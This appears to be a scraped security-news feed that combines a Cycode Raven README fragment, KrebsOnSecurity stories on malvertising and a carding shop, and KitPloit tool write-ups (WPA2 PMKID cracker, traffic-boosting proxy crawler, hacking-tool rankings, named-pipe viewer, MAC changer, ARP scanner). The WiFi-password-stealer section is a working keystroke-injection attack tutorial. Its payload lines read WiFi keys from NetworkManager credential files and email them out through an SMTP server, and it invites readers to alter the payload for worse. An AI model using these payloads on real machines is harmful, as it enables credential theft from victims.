  • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



Perfecting the Defense-in-Depth Strategy with Automation

Medieval castles stood as impregnable fortresses for centuries, thanks to their meticulous design. Fast forward to the digital age, and this medieval wisdom still echoes in cybersecurity. Like castles with strategic layouts to withstand attacks, the Defense-in-Depth strategy is the modern counterpart — a multi-layered approach with strategic redundancy and a blend of passive and active security

Using Google Search to Find Software Can Be Risky

Google continues to struggle with cybercriminals running malicious ads on its search platform to trick people into downloading booby-trapped copies of popular free software applications. The malicious ads, which appear above organic search results and often precede links to legitimate sources of the same software, can make searching for software on Google a dicey affair.

Google says keeping users safe is a top priority, and that the company has a team of thousands working around the clock to create and enforce their abuse policies. And by most accounts, the threat from bad ads leading to backdoored software has subsided significantly compared to a year ago.

But cybercrooks are constantly figuring out ingenious ways to fly beneath Google’s anti-abuse radar, and new examples of bad ads leading to malware are still too common.

For example, a Google search earlier this week for the free graphic design program FreeCAD produced the following result, which shows that a “Sponsored” ad at the top of the search results is advertising the software available from freecad-us[.]org. Although this website claims to be the official FreeCAD website, that honor belongs to the result directly below — the legitimate freecad.org.

How do we know freecad-us[.]org is malicious? A review at DomainTools.com show this domain is the newest (registered Jan. 19, 2024) of more than 200 domains at the Internet address 93.190.143[.]252 that are confusingly similar to popular software titles, including dashlane-project[.]com, filezillasoft[.]com, keepermanager[.]com, and libreofficeproject[.]com.

Some of the domains at this Netherlands host appear to be little more than software review websites that steal content from established information sources in the IT world, including Gartner, PCWorld, Slashdot and TechRadar.

Other domains at 93.190.143[.]252 do serve actual software downloads, but none of them are likely to be malicious if one visits the sites through direct navigation. If one visits openai-project[.]org and downloads a copy of the popular Windows desktop management application Rainmeter, for example, the file that is downloaded has the same exact file signature as the real Rainmeter installer available from rainmeter.net.

But this is only a ruse, says Tom Hegel, principal threat researcher at the security firm Sentinel One. Hegel has been tracking these malicious domains for more than a year, and he said the seemingly benign software download sites will periodically turn evil, swapping out legitimate copies of popular software titles with backdoored versions that will allow cybercriminals to remotely commander the systems.

“They’re using automation to pull in fake content, and they’re rotating in and out of hosting malware,” Hegel said, noting that the malicious downloads may only be offered to visitors who come from specific geographic locations, like the United States. “In the malicious ad campaigns we’ve seen tied to this group, they would wait until the domains gain legitimacy on the search engines, and then flip the page for a day or so and then flip back.”

In February 2023, Hegel co-authored a report on this same network, which Sentinel One has dubbed MalVirt (a play on “malvertising”). They concluded that the surge in malicious ads spoofing various software products was directly responsible for a surge in malware infections from infostealer trojans like IcedID, Redline Stealer, Formbook and AuroraStealer.

Hegel noted that the spike in malicious software-themed ads came not long after Microsoft started blocking by default Office macros in documents downloaded from the Internet. He said the volume of the current malicious ad campaigns from this group appears to be relatively low compared to a year ago.

“It appears to be same campaign continuing,” Hegel said. “Last January, every Google search for ‘Autocad’ led to something bad. Now, it’s like they’re paying Google to get one out of every dozen of searches. My guess it’s still continuing because of the up-and-down [of the] domains hosting malware and then looking legitimate.”

Several of the websites at this Netherlands host (93.190.143[.]252) are currently blocked by Google’s Safebrowsing technology, and labeled with a conspicuous red warning saying the website will try to foist malware on visitors who ignore the warning and continue.

But it remains a mystery why Google has not similarly blocked more than 240+ other domains at this same host, or else removed them from its search index entirely. Especially considering there is nothing else but these domains hosted at that Netherlands IP address, and because they have all remained at that address for the past year.

In response to questions from KrebsOnSecurity, Google said maintaining a safe ads ecosystem and keeping malware off of its platforms is a priority across Google.

“Bad actors often employ sophisticated measures to conceal their identities and evade our policies and enforcement, sometimes showing Google one thing and users something else,” Google said in a written statement. “We’ve reviewed the ads in question, removed those that violated our policies, and suspended the associated accounts. We’ll continue to monitor and apply our protections.”

Google says it removed 5.2 billion ads in 2022, and restricted more than 4.3 billion ads and suspended over 6.7 million advertiser accounts. The company’s latest ad safety report says Google in 2022 blocked or removed 1.36 billion advertisements for violating its abuse policies.

Some of the domains referenced in this story were included in Sentinel One’s February 2023 report, but dozens more have been added since, such as those spoofing the official download sites for Corel Draw, Github Desktop, Roboform and Teamviewer.

This October 2023 report on the FreeCAD user forum came from a user who reported downloading a copy of the software from freecadsoft[.]com after seeing the site promoted at the top of a Google search result for “freecad.” Almost a month later, another FreeCAD user reported getting stung by the same scam.

“This got me,” FreeCAD forum user “Matterform” wrote on Nov. 19, 2023. “Please leave a report with Google so it can flag it. They paid Google for sponsored posts.”

Sentinel One’s report didn’t delve into the “who” behind this ongoing MalVirt campaign, and there are precious few clues that point to attribution. All of the domains in question were registered through webnic.cc, and several of them display a placeholder page saying the site is ready for content. Viewing the HTML source of these placeholder pages shows many of the hidden comments in the code are in Cyrillic.

Trying to track the crooks using Google’s Ad Transparency tools didn’t lead far. The ad transparency record for the malicious ad featuring freecad-us[.]org (in the screenshot above) shows that the advertising account used to pay for the ad has only run one previous ad through Google search: It advertised a wedding photography website in New Zealand.

The apparent owner of that photography website did not respond to requests for comment, but it’s also likely his Google advertising account was hacked and used to run these malicious ads.

E-Crime Rapper ‘Punchmade Dev’ Debuts Card Shop

The rapper and social media personality Punchmade Dev is perhaps best known for his flashy videos singing the praises of a cybercrime lifestyle. With memorable hits such as “Internet Swiping” and “Million Dollar Criminal” earning millions of views, Punchmade has leveraged his considerable following to peddle tutorials on how to commit financial crimes online. But until recently, there wasn’t much to support a conclusion that Punchmade was actually doing the cybercrime things he promotes in his songs.

Images from Punchmade Dev’s Twitter/X account show him displaying bags of cash and wearing a functional diamond-crusted payment card skimmer.

Punchmade Dev’s most controversial mix — a rap called “Wire Fraud Tutorial” — was taken down by Youtube last summer for violating the site’s rules. Punchmade shared on social media that the video’s removal was prompted by YouTube receiving a legal process request from law enforcement officials.

The 24-year-old rapper told reporters he wasn’t instructing people how to conduct wire fraud, but instead informing his fans on how to avoid being victims of wire fraud. However, this is difficult to discern from listening to the song, which sounds very much like a step-by-step tutorial on how to commit wire fraud.

“Listen up, I’m finna show y’all how to hit a bank,” Wire Fraud Tutorial begins. “Just pay attention, this is a quick way to jug in any state. First you wanna get a bank log from a trusted site. Do your research because the information must be right.”

And even though we’re talking about an individual who regularly appears in videos wearing a half-million dollars worth of custom jewelry draped around his arm and neck (including the functional diamond-encrusted payment card skimming device pictured above), there’s never been much evidence that Punchmade was actually involved in committing cybercrimes himself. Even his most vocal critics acknowledged that the whole persona could just be savvy marketing.

That changed recently when Punchmade’s various video and social media accounts began promoting a new web shop that is selling stolen payment cards and identity data, as well as hacked financial accounts and software for producing counterfeit checks.

Punchmade Dev's shop.

Punchmade Dev’s shop.

The official Punchmadedev account on Instagram links to many of the aforementioned rap videos and tutorials on cybercriming, as well as to Punchmadedev’s other profiles and websites. Among them is mainpage[.]me/punchmade, which includes the following information for “Punchmade Empire ®

-212,961 subscribers

#1 source on Telegram

Contact: @whopunchmade

24/7 shop: https://punchmade[.]atshop[.]io

Visiting that @whopunchmade Telegram channel shows this user is promoting punchmade[.]atshop[.]io, which is currently selling hacked bank accounts and payment cards with high balances.

Clicking “purchase” on the C@sh App offering, for example, shows that for $80 the buyer will receive logins to Cash App accounts with balances between $3,000 and $5,000. “If you buy this item you’ll get my full support on discord/telegram if there is a problem!,” the site promises. Purchases can be made in cryptocurrencies, and checking out prompts one to continue payment at Coinbase.com.

Another item for sale, “Fullz + Linkable CC,” promises “ID Front + Back, SSN with 700+ Credit Score, and Linkable CC” or credit card. That also can be had for $80 in crypto.

WHO IS PUNCHMADE DEV?

Punchmade has fashioned his public persona around a collection of custom-made, diamond-covered necklaces that are as outlandish and gaudy as they are revelatory. My favorite shot from one of Punchmade’s videos features at least three of these monstrosities: One appears to be a boring old diamond and gold covered bitcoin, but the other two necklaces tell us something about where Punchmade is from:

Notice the University of Kentucky logo, and the Lexington, Ky skyline.

One of them includes the logo and mascot of the University of Kentucky. The other, an enormous diamond studded skyline, appears to have been designed based on the skyline in Lexington, Ky:

The “About” page on Punchmade Dev’s Spotify profile describes him as “an American artist, rapper, musician, producer, director, entrepreneur, actor and investor.” “Punchmade Dev is best known for his creative ways to use technology, video gaming, and social media to build a fan base,” the profile continues.

The profile explains that he launched his own record label in 2021 called Punchmade Records, where he produces his own instrumentals and edits his own music videos.

A search on companies that include the name “punchmade” at the website of the Kentucky Secretary of State brings up just one record: OBN Group LLC, in Lexington, Ky. This November 2021 record includes a Certificate of Assumed Name, which shows that Punchmade LLC is the assumed name of OBN Group LLC.

The president of OBN Group LLC is listed as Devon Turner. A search on the Secretary of State website for other businesses tied to Devon Turner reveals just one other record: A now-defunct entity called DevTakeFlightBeats Inc.

The breach tracking service Constella Intelligence finds that Devon Turner from Lexington, Ky. used the email address obndevpayments@gmail.com. A lookup on this email at DomainTools.com shows it was used to register the domain foreverpunchmade[.]com, which is registered to a Devon Turner in Lexington, Ky. A copy of this site at archive.org indicates it once sold Punchmade Dev-branded t-shirts and other merchandise.

Mr. Turner did not respond to multiple requests for comment.

Searching online for Devon Turner and “Punchmade” brings up a video from @brainjuiceofficial, a YouTube channel that focuses on social media celebrities. @Brainjuiceofficial says Turner was born in October 2000, the oldest child of a single mother of five whose husband was not in the picture.

Devon Turner, a.k.a. “Punchmade Dev,” in an undated photo.

The video says the six-foot five Turner played basketball, track and football in high school, but that he gradually became obsessed with playing the video game NBA 2K17 and building a following of people watching him play the game competitively online.

According to this brief documentary, Turner previously streamed his NBA 2K17 videos on a YouTube channel called DevTakeFlight, although he originally went by the nickname OBN Dev.

“Things may eventually catch up to Devon if he isn’t careful,” @Brainjuiceofficial observed, noting that Turner has been shot at before, and also robbed at an ATM while flexing a bunch of cash for a picture and wearing $500k in jewelry. “Although you have a lot of people that are into what you do, there are a lot of people waiting for you to slip up.”

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage.

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
  • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  1. Install dependencies:
pip3 install -r requirements.txt
  1. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


Snapshots:

If you find this GitHub repo useful, please consider giving it a star! 



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


Top 20 Most Popular Hacking Tools in 2023

By: Zion3R

As last year, this year we made a ranking with the most popular tools between January and December 2023.

The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


  1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


  2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


  3. Faraday - Open Source Vulnerability Management Platform


  4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


  5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


  6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  7. Waf-Bypass - Check Your WAF Before An Attacker Does


  8. PentestGPT - A GPT-empowered Penetration Testing Tool


  9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


  10. LSMS - Linux Security And Monitoring Scripts


  11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


  12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


  13. ThunderCloud - Cloud Exploit Framework


  14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


  15. Kscan - Simple Asset Mapping Tool


  16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


  17. DNSWatch - DNS Traffic Sniffer and Analyzer


  18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


  19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


  20. XSS-Exploitation-Tool - An XSS Exploitation Tool





Happy New Year wishes the KitPloit team!


PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

By: Zion3R


A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

Overview

PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


Usage

Double-click the EXE binary and you will get the list of all named pipes.

Build

We used Visual Studio to compile it.
When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:

Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

Warning

We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
Note that James Forshaw talked about it here.
We can't change it because we depend on third-party DLL.

Features

  • A detailed overview of named pipes.
  • Filter\highlight rows based on cells.
  • Bold specific rows.
  • Export\Import to\from JSON.
  • PipeChat - create a connection with available named pipes.

Demo

PipeViewer3_v1.0.mp4

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

License

Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



MacMaster - MAC Address Changer

By: Zion3R


MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

Features

  • Custom MAC Address: Set a specific MAC address to your network interface.
  • Random MAC Address: Generate and set a random MAC address.
  • Reset to Original: Reset the MAC address to its original hardware value.
  • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
  • Version Information: Easily check the version of MacMaster you are using.

Installation

MacMaster requires Python 3.6 or later.

  1. Clone the repository:
    $ git clone https://github.com/HalilDeniz/MacMaster.git
  2. Navigate to the cloned directory:
    cd MacMaster
  3. Install the package:
    $ python setup.py install

Usage

$ macmaster --help         
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

MacMaster: Mac Address Changer

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value

Arguments

  • --interface, -i: Specify the network interface.
  • --random, -r: Set a random MAC address.
  • --newmac, -nm: Set a specific MAC address.
  • --customoui, -co: Set a custom OUI for the MAC address.
  • --reset, -rs: Reset MAC address to the original value.
  • --version, -V: Show the version of the program.
  1. Set a specific MAC address:
    $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
  2. Set a random MAC address:
    $ macmaster.py -i eth0 -r
  3. Reset MAC address to its original value:
    $ macmaster.py -i eth0 -rs
  4. Set a custom OUI:
    $ macmaster.py -i eth0 -co 08:00:27
  5. Show program version:
    $ macmaster.py -V

Replace eth0 with your desired network interface.

Note

You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

Contributing

Contributions are welcome! To contribute to MacMaster, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:

Contact



NetProbe - Network Probe

By: Zion3R


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h,--help: show this help message and exit
  • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i,--interface: Interface to use (default: None)
  • -l,--live: Enable live tracking of devices
  • -o,--output: Output file to save the results
  • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s,--scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

